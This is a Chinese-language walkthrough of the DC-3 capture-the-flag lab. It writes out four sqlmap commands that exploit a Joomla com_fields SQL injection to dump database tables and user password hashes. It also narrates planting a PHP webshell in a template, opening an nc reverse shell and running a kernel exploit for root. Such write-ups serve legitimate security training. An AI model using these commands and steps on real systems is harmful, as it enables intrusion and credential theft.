#环境准备

dc-3 虚拟机：网卡NAT模式

kali攻击机：网卡NAT模式

#信息收集

nmap轻车熟路扫一下dc3的地址，识别出joomla系统

面向百度渗透，得知有一个joomla的扫描器，直接安排上，这下有版本号和后台登录地址

#渗透过程

使用kali的searchsploit工具搜索一下有没有这个漏洞，一搜一个准。我直接好家伙，看见poc，用sqlmap直接怼他

sqlmap -u "http://192.168.200.143/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

跑出数据库

我们接着跑一下joomladb表

sqlmap -u "http://192.168.200.143/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables

查看users表,这里会让你选一下字典，用默认的就行

 sqlmap -u "http://192.168.200.143/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users"  --columns

查看用户名名和密码

sqlmap -u "http://192.168.200.143/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users"  -C "password,username" --dump

kali自带神器john，这是一款破解密码工具，可以破解windows密码这些

使用之前扫到的后台地址，用账号密码登录该系统

点击Templates-> Beez3

在这里新建一个一句话木马

访问模板所在的路径url（
/templates/beez3/shell.php），php文件被解析

连上蚁剑，是www权限，这里找了一下，没有找到文件，可能在root目录下，看一下能不能提权

这里使用nc不带e参数反弹shell，kali先使用nc监听40010端口，然后去访问这个php文件

看一下系统内核，在漏洞库里面找一下相关的提权模块，每个poc都有相应的说明，注意别找错了

查看该文件，里面有使用说明和poc地址

由于网络原因，无法访问git，所以这里我在本地下载好zip文件，利用wget从本地进行下

解压出来后有一个编译文件，直接运行，可能会输出错误信息，不用管他，会生成一个doubleput文件，给他执行权限运行后，会出现提权成功

进入到root目录，查看flag